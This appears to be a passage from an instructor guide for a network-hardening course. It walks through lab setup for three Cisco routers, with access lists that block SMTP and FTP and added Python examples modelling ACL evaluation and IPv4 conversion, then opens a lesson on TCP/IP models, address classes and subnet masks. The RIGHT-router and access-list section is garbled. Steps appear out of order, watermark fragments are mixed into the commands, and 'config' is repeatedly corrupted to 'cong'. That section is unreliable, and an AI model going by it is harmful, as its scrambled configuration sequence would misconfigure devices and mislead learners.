    al. To press RETURN to get started, press Enter. The CENTER> prompt should now be displayed.

3. At the CENTER> prompt, enter en to activate enable mode.

4. When you are prompted for the password, enter instructor. The CENTER# prompt should now be displayed.

5. At the CENTER# prompt, enter conf t to enter config mode. The CENTER(config)# prompt should now be displayed.

6. At the CENTER(config)# prompt:
    a. Enter no ip domain lookup.
    b. Enter int s0 and the CENTER(config-if)# prompt should now be displayed.

7. At the CENTER(config-if)# prompt:
    a. Enter no shut.
    b. Enter clo ra 4000000.
    c. Enter ban 10000000.
    d. Enter int s1.
    e. Enter no shut.
    f. Enter clo ra 4000000.
    g. Enter ban 10000000.
    h. Enter exit and the CENTER(config)# prompt is now displayed.

8. At the CENTER(config)# prompt:
    a. Enter ip route 0.0.0.0 0.0.0.0 172.17.10.1.
    b. Enter exit and the CENTER# prompt is now displayed.

9. At the CENTER# prompt:
    a. Enter sh run and you should see a message indicating that the router is building the configuration.
    b. Enter copy ru st.

10. When you are prompted for a destination filename, press Enter to accept the default of startup-config. You should again see a message indicating that the router is building the configuration.

Setup for LEFT Router

The LEFT router is used by half of the students to connect to the rest of the class. To set up the LEFT router:

1. Boot up the router and console into it. You should be prompted to enter the initial configuration dialog. (If you are not, follow the procedures listed previously in the Before You Start the Router Setup section.)

2. When you are prompted:
    a. To enter the initial configuration dialog, enter y.
    b. To enter basic management setup, enter n.
    c. As to whether you want to see the current interface summary, press Enter.
    d. To enter the host name for [Router], enter LEFT.
    e. To enter the enable secret password, enter cisco.
    f. To enter the enable password, enter cisco1.
    g. To enter the virtual terminal password, enter 2501.
    h. To configure SNMP network management, enter n.
    i. To configure LAT, enter n.
    j. To configure bridging, press Enter to accept the default of No.
    k. To configure AppleTalk, press Enter to accept the default of No.
    l. To configure DECnet, press Enter to accept the default of No.
    m. To configure IP, press Enter to accept the default of Yes.
    n. To configure IGRP routing, enter n.
    o. To configure RIP routing, enter y.
    p. To configure CLNS, press Enter to accept the default of No.
    q. To configure IPX, press Enter to accept the default of No.
    r. To configure Vines, press Enter to accept the default of No.
    s. To configure XNS, press Enter to accept the default of No.
    t. To configure Apollo, press Enter to accept the default of No.
    u. If you are prompted to configure BRI, select switch type 0.
    v. To configure the Ethernet0 interface, press Enter to accept the default of Yes.
    w. To configure IP on this interface, press Enter to accept the default of Yes.
    x. For the IP address for this interface, enter 172.16.0.1.
    y. For the subnet mask for this interface, press Enter to accept the default of 255.255.0.0.
    z. To configure the Serial0 interface, press Enter to accept the default of Yes.
    aa. To configure IP on this interface, press Enter to accept the default of Yes.
    ab. To configure IP unnumbered on this interface, press Enter to accept the default of No.

    ac. For the IP address for this interface, enter 192.168.10.1.
    ad. For the subnet mask for this interface, press Enter to accept the default of 255.255.255.0.
    ae. To configure the Serial1 interface, enter n.
    af. If you are prompted to configure any other serial interfaces, enter n until a configuration command script is generated, and you are prompted to make a selection regarding the next action.
    ag. To enter your selection, press Enter to accept the default of 2. You should see a message indicating that the router is building the configuration. When the configuration build is complete, an OK message is displayed.
    ah. To press RETURN to get started, press Enter. The LEFT> prompt should now be displayed.

3. At the LEFT> prompt, enter en to activate enable mode.

4. When you are prompted for the password, enter cisco. The LEFT# prompt should now be displayed.

5. At the LEFT# prompt, enter conf t to enter config mode. The LEFT(config)# prompt should now be displayed.

6. At the LEFT(config)# prompt:
    a. Enter no ip domain lookup.
    b. Enter int s0 and the LEFT(config-if)# prompt should now be displayed.

7. At the LEFT(config-if)# prompt:
    a. Enter no shut.
    b. Enter ban 10000000.
    c. Enter exit and the LEFT(config)# prompt is now displayed.

8. At the LEFT(config)# prompt:
    a. Enter ip route 0.0.0.0 0.0.0.0 192.168.10.2.
    b. Enter exit and the LEFT# prompt is now displayed.

9. At the LEFT# prompt:
    a. Enter sh run and you should see a message indicating that the router is building the configuration.
    b. Enter copy ru st.

10. When you are prompted for a destination filename, press Enter to accept the default of startup-config. You should again see a message indicating that the router is building the configuration.

Setup for RIGHT Router

The RIGHT router is used by half of the students to connect to the rest of the class. To set up the RIGHT router:

1. Boot up the router and console into it. You should be prompted to enter the initial configuration dialog. (If you are not, follow the procedures listed previously in the Before You Start the Router Setup section.)

2. When you are prompted:
    a. To enter the initial configuration dialog, enter y.
    b. To enter basic management setup, enter n.
    c. As to whether you want to see the current interface summary, press Enter.
    d. To enter the host name for [Router], enter RIGHT.
    e. To enter the enable secret password, enter cisco.
    f. To enter the enable password, enter cisco1.
    g. To enter the virtual terminal password, enter 2501.
    h. To configure SNMP network management, enter n.
    i. To configure LAT, enter n.
    j. To configure bridging, press Enter to accept the default of No.
    k. To configure AppleTalk, press Enter to accept the default of No.
    l. To configure DECnet, press Enter to accept the default of No.
    m. To configure IP, press Enter to accept the default of Yes.
    n. To configure IGRP routing, enter n.
    o. To configure RIP routing, enter y.
    p. To configure CLNS, press Enter to accept the default of No.
    q. To configure IPX, press Enter to accept the default of No.
    r. To configure Vines, press Enter to accept the default of No.
    s. To configure XNS, press Enter to accept the default of No.
    t. To configure Apollo, press Enter to accept the default of No.
    u. If you are prompted to configure BRI, select switch type 0.
    v. To configure the Ethernet0 interface, press Enter to accept the default of Yes.
    w. To configure IP on this interface, press Enter to accept the default of Yes.
    x. For the IP address for this interface, enter 172.18.0.1.
    y. For the subnet mask for this interface, press Enter to accept the default of 255.255.0.0.
    z. To configure the Serial0 interface, enter n.
    aa. To configure the Serial1 interface, press Enter to accept the default of Yes.
    ab. To configure IP on this interface, press Enter to accept the default of Yes.
    ac. To configure IP unnumbered on this interface, press Enter to accept the default of No.
    ad. For the IP address for this interface, enter 192.168.20.1.
    ae. For the subnet mask for this interface, press Enter to accept the default of 255.255.255.0.

af. If you are prompted to congure any other serial interfaces, enter n until a conguration command script is generated, and you are prompted to make a selection regarding the next action. ag. To enter your selection, press Enter to accept the default of 2. You should see a message indicating that the router is building the conguration. When the conguration build is complete, an OK message is displayed. ah. To press RETURN to get started, press Enter. The RIGHT> prompt should now be displayed. 3. 4. 5. 6. At the RIGHT> prompt, enter en to activate enable mode.

At the RIGHT# prompt, enter conf t to enter cong mode. The RIGHT(cong)# prompt should now be displayed. At the RIGHT(cong)# prompt: a. b.

Enter no ip domain lookup.

Enter int s1 and the RIGHT(cong-if)# prompt should now be displayed.

Ed
T DU

7.

At the RIGHT(cong-if)# prompt: a. b. c. Enter no shut.

Enter exit and the RIGHT(cong)# prompt is now displayed.

st

In

Configuring the Access Lists


After the initial router setup and the basic conguration have been completed on all three routers, you need to enter the access lists for each of the routers. To do so: 1. To complete the LEFT Router Access Lists:

xlviii

Hardening The Infrastructure (SCP)

DO

ru ct
a. b. 9. a. b.

8.

At the RIGHT(cong)# prompt:

Enter ip route 0.0.0.0 0.0.0.0 192.168.20.2.

Enter exit and the RIGHT# prompt is now displayed.

At the RIGHT# prompt:

Enter copy ru st.

10. When you are prompted for a destination lename, press Enter to accept the default of startup-cong. You should again see a message indicating that the router is building the conguration.

NO

Enter sh run and you should see a message indicating that the router is building the conguration.

PL

IC

Enter ban 10000000.

or

AT

iti

When you are prompted for the password, enter cisco. The RIGHT# prompt should now be displayed.

on

a. b. c. d. e. f. g. 2.

At the LEFT# prompt, enter conf t to switch to cong mode. The LEFT(cong)# prompt is now displayed. At the LEFT(cong)# prompt, enter access-list 123 deny tcp any any eq 25. At the LEFT(cong)# prompt, enter int S0 to congure the interface. The LEFT(cong-if)# prompt is now displayed. At the LEFT(cong-if)# prompt, enter ip access-group 123 in. At the LEFT(cong-if)# prompt, press Ctrl+Z to leave cong mode. The LEFT# prompt is now displayed. At the LEFT# prompt, enter copy ru st and save the conguration changes to startup-cong.

To complete the RIGHT Router Access Lists: a. b. c. d. e. f. g.

At the RIGHT# prompt, enter conf t to switch to cong mode. The RIGHT(cong)# prompt is now displayed.

At the RIGHT(cong)# prompt, enter access-list 145 deny tcp any any eq 25. At the RIGHT(cong)# prompt, enter access-list 145 permit ip any any.

Ed
T DU PL IC

At the RIGHT(cong-if)# prompt, enter ip access-group 145 in. At the RIGHT(cong-if)# prompt, press Ctrl+Z to leave cong mode. The RIGHT# prompt is now displayed.

3.

To complete the CENTER Router Access Lists: a. b. c. d. e. f.

At the CENTER# prompt, enter conf t to switch to cong mode. The CENTER(cong)# prompt is now displayed.

st

At the CENTER(cong)# prompt, enter access-list 155 deny tcp any any eq 21. At the CENTER(cong)# prompt, enter access-list 155 permit ip any any. At the CENTER(cong)# prompt, enter int S1 to congure the S1 interface. The CENTER(cong-if)# prompt is now displayed. At the CENTER(cong-if)# prompt, enter ip access-group 155 in. At the CENTER(cong-if)# prompt, enter int S0 to congure the S0 interface. At the CENTER(cong-if)# prompt, enter ip access-group 155 in. At the CENTER(cong-if)# prompt, press Ctrl+Z to leave cong mode. The CENTER# prompt is now displayed.
About This Course xlix

In

g. h. i.

DO

NO

At the CENTER(cong)# prompt, enter access-list 155 deny tcp any any eq 20.

ru ct

At the RIGHT# prompt, enter copy ru st and save the conguration changes to startup-cong.

or

AT

At the RIGHT(cong)# prompt, enter int S1 to congure the interface. The RIGHT(cong-if)# prompt is now displayed.

iti

on

At the LEFT(cong)# prompt, enter access-list 123 permit ip any any.

j. 4.

At the CENTER# prompt, enter copy ru st and save the conguration changes to startup-cong.
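The three lists just entered are small enough to reason about by hand, but the rules that make them work (entries are evaluated top down, the first match decides, and an implicit deny follows the last entry) are the ones that bite in longer lists. The Python below is an added example and is not part of this instructor guide: it models those semantics over exactly the access-list lines typed in steps 1 through 3 and evaluates constructed sample packets against the inbound bindings from the ip access-group steps. The interface bindings, packet tuples and sample traffic are constructed for the demo, and only the any any address form used here is supported.

```python
"""Model Cisco numbered-ACL semantics for the three classroom access lists.

Added example, not part of the instructor guide.  Entries are evaluated top
down, the first matching entry decides, and anything that matches no entry
hits the implicit 'deny' at the end of every Cisco access list.  The access
list text is exactly what steps 1 through 3 above enter; the interface
bindings, packet tuples and sample traffic are constructed for the demo.
"""
import re
from dataclasses import dataclass
from typing import Optional

ACL_LINES = """
access-list 123 deny tcp any any eq 25
access-list 123 permit ip any any
access-list 145 deny tcp any any eq 25
access-list 145 permit ip any any
access-list 155 deny tcp any any eq 20
access-list 155 deny tcp any any eq 21
access-list 155 permit ip any any
"""

# (router, interface) -> list number, from the 'ip access-group <n> in' steps.
BINDINGS = {("LEFT", "S0"): 123, ("RIGHT", "S1"): 145,
            ("CENTER", "S0"): 155, ("CENTER", "S1"): 155}

ACE_RE = re.compile(
    r"^access-list\s+(?P<num>\d+)\s+(?P<action>permit|deny)\s+"
    r"(?P<proto>ip|tcp|udp|icmp)\s+(?P<src>\S+)\s+(?P<dst>\S+)"
    r"(?:\s+eq\s+(?P<port>\d+))?\s*$"
)


@dataclass(frozen=True)
class Ace:
    action: str
    proto: str
    port: Optional[int]          # destination port for 'eq'; None matches any port


@dataclass(frozen=True)
class Packet:
    proto: str                   # 'tcp', 'udp' or 'icmp'
    dst_port: Optional[int] = None


def parse_acls(text):
    """Return {list_number: [Ace, ...]} in the order the entries were typed."""
    acls = {}
    for line in text.strip().splitlines():
        m = ACE_RE.match(line.strip())
        if not m:
            raise ValueError(f"unsupported entry: {line!r}")
        if m["src"] != "any" or m["dst"] != "any":
            raise ValueError("only the 'any any' address form is modelled here")
        port = int(m["port"]) if m["port"] else None
        acls.setdefault(int(m["num"]), []).append(Ace(m["action"], m["proto"], port))
    return acls


def evaluate(acl, pkt):
    """Return 'permit' or 'deny' for pkt; unmatched traffic is denied."""
    for ace in acl:
        proto_ok = ace.proto == "ip" or ace.proto == pkt.proto
        port_ok = ace.port is None or ace.port == pkt.dst_port
        if proto_ok and port_ok:
            return ace.action
    return "deny"                # implicit deny any any


def inbound_decision(router, iface, pkt, acls=None):
    """Decision for pkt arriving on iface of router under the classroom bindings."""
    acls = parse_acls(ACL_LINES) if acls is None else acls
    num = BINDINGS.get((router, iface))
    if num is None:
        return "permit"          # no access-group applied on that interface
    return evaluate(acls[num], pkt)


if __name__ == "__main__":
    samples = [
        ("LEFT", "S0", Packet("tcp", 25)),     # SMTP arriving from CENTER: dropped
        ("LEFT", "S0", Packet("tcp", 23)),     # Telnet to a student router: allowed
        ("CENTER", "S1", Packet("tcp", 21)),   # FTP control arriving from LEFT: dropped
        ("CENTER", "S0", Packet("icmp")),      # ping across the classroom: allowed
        ("RIGHT", "S0", Packet("tcp", 25)),    # S0 has no list bound on RIGHT
    ]
    for router, iface, pkt in samples:
        print(f"{router:<6} {iface} {pkt.proto}/{pkt.dst_port} -> {inbound_decision(router, iface, pkt)}")
    # What the 'permit ip any any' step guards against: with only the deny entry,
    # the implicit deny also drops ICMP, RIP and Telnet.
    deny_only = parse_acls("access-list 123 deny tcp any any eq 25")[123]
    print("deny-only list, icmp ->", evaluate(deny_only, Packet("icmp")))
```

The last line is the case the permit ip any any steps exist for: a list that contains only the deny entry drops everything else arriving on that serial interface, including the RIP updates and the pings the next step relies on, so the classroom would look like a cabling fault rather than a filtering one.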

Test the classroom setup, and troubleshoot as necessary. Once physical connectivity issues have been sorted out, you should be able to ping from one side of the classroom to the other. Specifically, the instructor machine should be able to ping every student machine and vice versa. Student machines from the left side of the classroom should be able to ping student machines on the right side of the classroom and vice versa.

List of Additional Files

Printed with each lesson is a list of files students open to complete the tasks in that lesson. Many tasks also require additional files that students do not open, but are needed to support the file(s) students are working with. These supporting files are included with the student data files on the course CD-ROM or data disk. Do not delete these files.

HOW TO USE THIS BOOK

You can use this book as a learning guide, a review tool, and a reference.

As a Learning Guide

Each lesson covers one broad topic or set of related topics. Lessons are arranged in order of increasing proficiency with Hardening the Infrastructure; skills you acquire in one lesson are used and developed in subsequent lessons. For this reason, you should work through the lessons in sequence.

We organized each lesson into explanatory topics and step-by-step activities. Topics provide the theory you need to master Hardening the Infrastructure; activities allow you to apply this theory to practical hands-on examples. Through the use of sample files, hands-on activities, illustrations that give you feedback at crucial steps, and supporting background information, this book provides you with the foundation and structure to learn about Hardening the Infrastructure quickly and easily.

As a Review Tool

Any method of instruction is only as effective as the time and effort you are willing to invest in it. For this reason, we encourage you to spend some time reviewing the book's more challenging topics and activities.

As a Reference

You can use the Concepts sections in this book as a first source for definitions of terms, background information on given topics, and summaries of procedures.


LESSON 1
Advanced TCP/IP

Data Files: tftp.cap, fragment.cap, ping.txt, ping.cap, ftp.txt, ftp.cap
Lesson Time: 6 hours

Overview

There is one primary set of protocols that runs networks and the Internet today. In this lesson, you will work with those protocols: the Transmission Control Protocol (TCP) and the Internet Protocol (IP). In order to manage the security of a network, you must become familiar with the details of how TCP/IP functions, including core concepts, such as addressing and subnetting, and advanced concepts, such as session establishment and packet analysis.

Objectives

To better understand advanced TCP/IP concepts, you will:

1A Define the core concepts of TCP/IP.
Given a machine running TCP/IP, you will define the core concepts of TCP/IP, including the layering models, RFCs, addressing and subnetting, VLSM and CIDR, and the TCP/IP suite.

1B Analyze sessions of TCP.
Given a Windows 2000 computer, you will examine control flags, sequence numbers, and acknowledgement numbers, and you will use Network Monitor to view and analyze all of the fields of the three-way handshake and session teardowns.

1C Analyze IP.
Given a Windows 2000 computer, you will use Network Monitor to view and analyze all the fields of IP.

1D Analyze ICMP.
Given a Windows 2000 computer, you will use Network Monitor to view and analyze all the fields of ICMP.

1E Analyze TCP.
Given a Windows 2000 computer, you will use Network Monitor to view and analyze all the fields of TCP.

1F Analyze UDP.
Given a Windows 2000 computer, you will use Network Monitor to view and analyze all the fields of UDP.

1G Analyze fragmentation.
Given a Windows 2000 computer, you will use Network Monitor to view and analyze network traffic fragmentation.

1H Complete a full session analysis.
Given a Windows 2000 computer, you will use Network Monitor to view and analyze a complete FTP session, frame by frame.

1I Examine the concepts of Internet Protocol version 6.
In this topic, you will be introduced to the fundamental concepts surrounding Internet Protocol version 6, and its implementation in networking.

Topic 1A
TCP/IP Concepts

In order for two hosts to communicate, there must first be an agreed-upon method of communication for both hosts to use. The protocol that the Internet was built on, and the protocol that all hosts on the Internet use, is TCP/IP, or Transmission Control Protocol/Internet Protocol. Because the two hosts agree on the protocol they will use, we can go right into the details of the protocol itself.

Many of the Concepts in this topic were covered in the prerequisite courses, but are provided here for review.

host: A single computer or workstation; it can be connected to a network.

server: A system that provides network service such as disk storage and file transfer, or a program that provides such a service. A kind of daemon that performs a service for the requester, which often runs on a computer other than the client machine.

network: Two or more machines interconnected for communications.

The TCP/IP Model

In order for data to move from one host to another, it must be transmitted and received. There are several ways that this could happen, in theory.

- The data file could be sent as a whole file, intact, from one host to another.
- The data file could be split in half and sent, sending and receiving two equal-sized pieces.
- The data file could be split into many smaller pieces, all sent and received in a specific sequence.

It is this last method that is actually used. For example, if a user is at a host and wants to view a Web page on a different host, the request and subsequent response will take many small steps to complete. In Figure 1-1, you can see the four layers of the TCP/IP Model, along with the Web browser's request for a Web page going to the Web server.

Figure 1-1: A Web request moving along the TCP/IP Model.

The four layers of the TCP/IP Model are:

- The Application Layer
- The Transport Layer
- The Internet Layer (also called the Network Layer)
- The Network Access Layer (also called the Link Layer)

The TCP/IP Layers

The reason that there are alternate names for these layers is that there has never been a standard for the names on which the industry agrees. Each of these layers is detailed as follows:

- The Application Layer is the highest layer in the model, and communicates with the software that requires the network. In our example, the software is the Web page request from a browser.
- The Transport Layer is where the reliability of the communication is dealt with. There are two protocols that work at this layer, TCP (Transmission Control Protocol) and UDP (User Datagram Protocol). An immediate difference between the two is that TCP does provide for reliable delivery of data, whereas UDP provides no such guarantee.
- The Internet Layer (or Network Layer) provides the mechanism required to address and move the data from one host to the other. The primary protocol you will examine at this layer is IP (Internet Protocol).
- The Network Access Layer (or Link Layer) is where the data communication interacts with the physical medium of the network. This is the layer that does the actual sending and receiving of the data.

As you saw in Figure 1-1, as the Web page request was initiated on the host, it moved down the layers, was transmitted across the network, and moved up the layers on the Web server. These are the layers on which all network communication using TCP/IP is based. There is a different set of layers, however, called the OSI Model.

The OSI Model

The TCP/IP Model works well for TCP/IP communications, but there are many protocols and methods of communication other than TCP/IP. A standard was needed to encompass all of the communication protocols. The standard developed by the International Organization for Standardization (ISO) is called the OSI Model.

OSI: (Open Systems Interconnection) A set of internationally accepted and openly developed standards that meet the needs of network resource administration and integrated network components.

The Open Systems Interconnect (OSI) Model has seven layers, compared to the four layers of the TCP/IP Model. The seven layers of the OSI Model are:

- The Application Layer
- The Presentation Layer
- The Session Layer
- The Transport Layer
- The Network Layer
- The Data Link Layer
- The Physical Layer

The OSI Layers

The names of these layers are fixed, as this is an agreed-upon standard. The details of each layer are as follows:

- The Application Layer is the highest layer of the OSI Model, and deals with interaction between the software and the network.
- The Presentation Layer is responsible for data services such as data compression and data encryption/decryption.
- The Session Layer is responsible for establishing, managing (such as packet size), and ending a session between two hosts.
- The Transport Layer is responsible for error control and data recovery between two hosts. Both TCP and UDP work at this layer.
- The Network Layer is responsible for logical addressing, routing, and forwarding of datagrams. IP works at this layer.
- The Data Link Layer is responsible for packaging data frames for transmission on the physical medium. Error control is added at this layer, often in the form of a Cyclic Redundancy Check (CRC). This layer is subdivided into the LLC (Logical Link Control) and MAC (Media Access Control) sublayers. The MAC sublayer is associated with the physical address of the network device, and the LLC sublayer makes the association between this physical address (such as the 48-bit MAC address if using Ethernet) and the logical address (such as the 32-bit IP address if using IP) at the Network Layer.
- The Physical Layer is responsible for the actual transmission and receipt of the data bit stream on the physical medium.

Figure 1-2: A comparison of the OSI and TCP/IP Models.

The OSI Model and the TCP/IP Model do fit together. In Figure 1-2, you can see that the two primary layers of concern in the TCP/IP Model (the Transport and Internet Layers) match directly with the Transport and Network Layers of the OSI Model, while the other two TCP/IP Model layers encompass two or more layers of the OSI Model.

packet: A block of data sent over the network transmitting the identities of the sending and receiving stations, error-control information, and message.

As the data from one host flows down the layers of the model, each layer attaches a small piece of information relevant to that layer. This attachment is called the header. For example, the Network Layer header will identify the logical addresses (such as IP addresses) used for this transmission. This process of adding a header at each layer is called encapsulating. Figure 1-3 shows a visual representation of the header and the encapsulation process.

Figure 1-3: Headers and the encapsulation process as data moves down the stack.

When the second host receives the data, and as the data moves up the layers, each header will let the host know how to handle this piece of data. After all the headers have been removed, the receiving host is left with the data as it was sent.

RFCs

With all the standards defined in the previous section, you may be asking where to go to find the standards. The answer is the RFCs. A Request For Comments (RFC) is the industry location for standards relating to TCP/IP and the Internet. RFCs are freely available documents to read and study, and if you ever want to go directly to the source, be sure to use the RFC. Although you will find RFCs listed all over the Internet, to view them all online go to www.rfc-editor.org. This is the Web site with a searchable index of all RFCs. There are several RFCs you should be familiar with, and that you should know by number to look up. This way you will not have to search hundreds of responses to find what you need. The RFCs you should know are:

- The Internet Protocol (IP): RFC 791
- The Internet Control Message Protocol (ICMP): RFC 792
- The Transmission Control Protocol (TCP): RFC 793
- The User Datagram Protocol (UDP): RFC 768

The Function of IP

The Internet Protocol (which works at the Network Layer of both the OSI and the TCP/IP models), by definition, has a simple function. IP identifies the current host, via an address, and, using addressing, moves a packet of information from one host to another. Each host on the network has a unique IP address, and each packet the host sends will contain its own IP address and the IP address to which the packet is destined.

The packets are then directed, or routed, across the network, using the destination address, until they reach their final destination. The receiving host can read the IP address of the sender and send a response, if required. Although it sounds straightforward, and does work, there are drawbacks. For instance, when packets are sent from one host to another, they may be received out of order. IP has no mechanism for dealing with that problem. Also, packets can get lost or corrupted during transmission, again a problem IP does not manage. These problems are left to an upper protocol to manage. Often that protocol will be TCP, as you will see in the following topic.

Binary, Decimal, and Hexadecimal Conversions

The IP addresses that are either manually or dynamically assigned to a host are 32-bit fields, often shown as four decimal values for ease of reading. For example, a common address would be 192.168.10.1. Each number is an 8-bit binary value, or an octet. In this example, the first octet is 192, the second 168, the third 10, and the fourth 1. Even though the fourth octet is given a decimal value of 1, it is still given an 8-bit value in IP addressing. Each bit of the 32-bit address must be represented, so the computer sees a decimal 1 in an IP address as 00000001. Keeping this in mind, the full decimal IP address of 192.168.10.1 is seen by the computer as the binary IP address:

11000000.10101000.00001010.00000001

In tools that are designed to capture and analyze network traffic, the IP address is often represented in its hexadecimal (Hex) format. The ability to view and recognize addressing in Hex format is a useful skill to have when you are working with TCP/IP. In hexadecimal format, the IP address 192.168.10.1 is C0-A8-0A-01. Following is a quick summary on Hex conversions.

Even though you may be familiar with the concept of binary math, you may wish to review this section briefly. In binary, each bit has the ability to be either a 1 or a 0. In computers, these bits are stored in groups of 8. Since each bit can be either a 1 or a 0, each location is designated a power of 2. A byte, therefore, has binary values from 2^0 through 2^7. In Figure 1-4, you can see the value of each of the 8 bits in a byte.

When the bits are presented as a byte, the value of each of the 8 locations is added to present you with the decimal equivalent. For example, if all 8 bits were 1s, such as 11111111, then the decimal value would be 255, or 128+64+32+16+8+4+2+1. Here are a few other quick binary-to-decimal conversions:

- Binary 10000000 is decimal 128, or 128+0+0+0+0+0+0+0
- Binary 11000000 is decimal 192, or 128+64+0+0+0+0+0+0
- Binary 10000010 is decimal 130, or 128+0+0+0+0+0+2+0
- Binary 01011010 is decimal 90, or 0+64+0+16+8+0+2+0

To convert the decimal address 192.168.10.1 to hexadecimal, convert each of its octets, then combine the results, as follows:

1. Divide 192 by 16. The result is 12, with a remainder of 0. Because decimal 12 is the same as Hex C and decimal 0 is the same as Hex 0, decimal 192 is equal to Hex C0.
2. Divide 168 by 16. The result is 10, with a remainder of 8. Because decimal 10 is the same as Hex A and decimal 8 is the same as Hex 8, decimal 168 is equal to Hex A8.
3. Decimal 10 is the same as Hex A.
4. Decimal 1 is the same as Hex 1.
5. Combining the results of each conversion shows that decimal 192.168.10.1 is equal to Hex C0A80A01.

Another way to derive this result is to first convert from decimal to binary, then convert binary to hexadecimal four bits at a time, and finally, combine the results, as shown here:

1. Decimal 192 is the same as binary 11000000.
2. Decimal 168 is the same as binary 10101000.
3. Decimal 10 is the same as binary 00001010.
4. Decimal 1 is the same as binary 00000001.
5. Binary 1100 (the first four bits of the first octet) is the same as Hex C.
6. Binary 0000 is the same as Hex 0.
7. Binary 1010 is the same as Hex A.
8. Binary 1000 is the same as Hex 8.
9. Binary 0000 is the same as Hex 0.
10. Binary 1010 is the same as Hex A.
11. Binary 0000 is the same as Hex 0.
12. Binary 0001 is the same as Hex 1.
13. Combining the Hex equivalents shows that decimal 192.168.10.1 is equal to Hex C0A80A01.

IP Address Classes

There are five defined classes of IP addresses: Class A, Class B, Class C, Class D, and Class E. The details of each class are as follows:

- Class A IP addresses use the first 8 bits of an IP address to define the network, and the remaining 24 bits to define the host. This means there can be more than 16 million hosts in each Class A network (2^24 - 2, because all 1s and all 0s cannot be used as host addresses). All Class A IP addresses will have a first octet of 0xxxxxxx in binary format. 10.10.10.10 is an example of a Class A IP address.
- Class B IP addresses use the first 16 bits to define the network, and the remaining 16 bits to define the host. This means there can be more than 65,000 hosts in each Class B network (2^16 - 2). All Class B IP addresses will have a first octet of 10xxxxxx in binary format. 172.16.31.200 is an example of a Class B IP address.
- Class C IP addresses use the first 24 bits to define the network, and the remaining 8 bits to define the host. This means there can be only 254 hosts in each Class C network (2^8 - 2). All Class C IP addresses will have a first octet of 110xxxxx in binary format. 192.168.10.1 is an example of a Class C IP address.
- Class D IP addressing is not used for hosts, but is often used for multicasting (which will be discussed later), where there is more than one recipient. The first-octet binary value of a Class D IP address is 1110xxxx. 224.0.0.9 is an example of a Class D IP address.
- Class E IP addressing is used for experimental functions and for future use. It does have a defined first-octet binary value as well. All Class E IP addresses have a first-octet binary value of 11110xxx. 241.1.2.3 is an example of a Class E IP address.

Figure 1-4: IP address classes and their first-octet values.

Private IP Addresses and Special-function IP Addresses

There are several ranges of IP addresses that are not used on the Internet. These addresses are known as private, or reserved, IP addresses. Defined in RFC 1918, any host on any network can use these addresses, but these addresses are not meant to be used on the Internet, and most routers will not forward them. By using these reserved IP addresses, organizations do not have to be as concerned with address conflicts. The defined private addresses for the three main address classes (A, B, and C) are:

- Class A: 10.0.0.0 to 10.255.255.255
- Class B: 172.16.0.0 to 172.31.255.255
- Class C: 192.168.0.0 to 192.168.255.255

In addition to the private address ranges listed, there are a few other address ranges that have other functions. The first is the range of 127.0.0.0 to 127.255.255.255. This address range is used for diagnostic purposes, with the common address of 127.0.0.1 used to identify IP on the host itself. The second range is 169.254.0.0 to 169.254.255.255. This address range is used by Microsoft to allocate addresses to hosts, for Automatic Private IP Addressing (APIPA).
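The conversions and first-octet rules above, carried out in code. This is an added example written for this edition, not part of the original course material, and the function names are my own; the RFC 1918 Class B range 172.16.0.0 to 172.31.255.255 is expressed as the equivalent prefix 172.16.0.0/12.

```python
"""IPv4 address representations and classification (added example)."""


def dotted_to_int(addr: str) -> int:
    """Parse dotted decimal into a 32-bit integer, validating each octet."""
    octets = addr.split(".")
    if len(octets) != 4:
        raise ValueError(f"expected four octets: {addr!r}")
    value = 0
    for octet in octets:
        n = int(octet)
        if not 0 <= n <= 255:
            raise ValueError(f"octet out of range: {octet!r}")
        value = (value << 8) | n
    return value


def to_binary(addr: str) -> str:
    """Dotted binary as the computer sees it: 192.168.10.1 -> 11000000.10101000.00001010.00000001"""
    value = dotted_to_int(addr)
    return ".".join(f"{(value >> s) & 0xFF:08b}" for s in (24, 16, 8, 0))


def to_hex(addr: str) -> str:
    """Hex as capture tools display it: 192.168.10.1 -> C0-A8-0A-01"""
    value = dotted_to_int(addr)
    return "-".join(f"{(value >> s) & 0xFF:02X}" for s in (24, 16, 8, 0))


def hex_to_dotted(hexaddr: str) -> str:
    """Reverse conversion, accepting C0-A8-0A-01 or C0A80A01."""
    digits = hexaddr.replace("-", "")
    if len(digits) != 8:
        raise ValueError(f"expected eight hex digits: {hexaddr!r}")
    return ".".join(str(int(digits[i:i + 2], 16)) for i in range(0, 8, 2))


def address_class(addr: str) -> str:
    """Classify by the leading bits of the first octet: 0, 10, 110, 1110, 11110."""
    first = dotted_to_int(addr) >> 24
    if first >> 7 == 0b0:
        return "A"
    if first >> 6 == 0b10:
        return "B"
    if first >> 5 == 0b110:
        return "C"
    if first >> 4 == 0b1110:
        return "D"
    return "E"


# Ranges from the text that are not seen on the Internet, as (network, prefix).
# 172.16.0.0/12 is the same block as 172.16.0.0 to 172.31.255.255.
SPECIAL_RANGES = {
    "private (RFC 1918)": [("10.0.0.0", 8), ("172.16.0.0", 12), ("192.168.0.0", 16)],
    "loopback": [("127.0.0.0", 8)],
    "APIPA": [("169.254.0.0", 16)],
}


def in_range(addr: str, network: str, prefix: int) -> bool:
    """True if addr falls inside network/prefix (AND both sides with the mask)."""
    mask = (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF
    return (dotted_to_int(addr) & mask) == (dotted_to_int(network) & mask)


def special_use(addr: str):
    """Label of the special-use range addr belongs to, or None if it is a normal address."""
    for label, ranges in SPECIAL_RANGES.items():
        if any(in_range(addr, net, prefix) for net, prefix in ranges):
            return label
    return None


if __name__ == "__main__":
    # The example addresses used in the text, one per class.
    for a in ("192.168.10.1", "10.10.10.10", "172.16.31.200", "224.0.0.9", "241.1.2.3"):
        print(f"{a:>14}  {to_binary(a)}  {to_hex(a)}  class {address_class(a)}  {special_use(a)}")
```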

The Subnet Mask

Along with an IP address, each host that uses TCP/IP has a subnet mask. The subnet mask is used during a process called ANDing to determine the network to which the host belongs. The way the mask identifies the network is by the number of bits allocated, or masked, for the network. A bit that is masked is identified with a binary value of 1. By default, a Class A IP address has 8 bits masked to identify the network, a Class B IP address has 16 bits masked to identify the network, and a Class C IP address has 24 bits masked to identify the network. These default subnet masks use contiguous bits to create the full mask. The following table shows the default subnet masks for the three classes, first in binary, then in the more traditional dotted decimal format.

Default Subnet Masks

Class  Binary Format                        Dotted Decimal Format
A      11111111.00000000.00000000.00000000  255.0.0.0
B      11111111.11111111.00000000.00000000  255.255.0.0
C      11111111.11111111.11111111.00000000  255.255.255.0

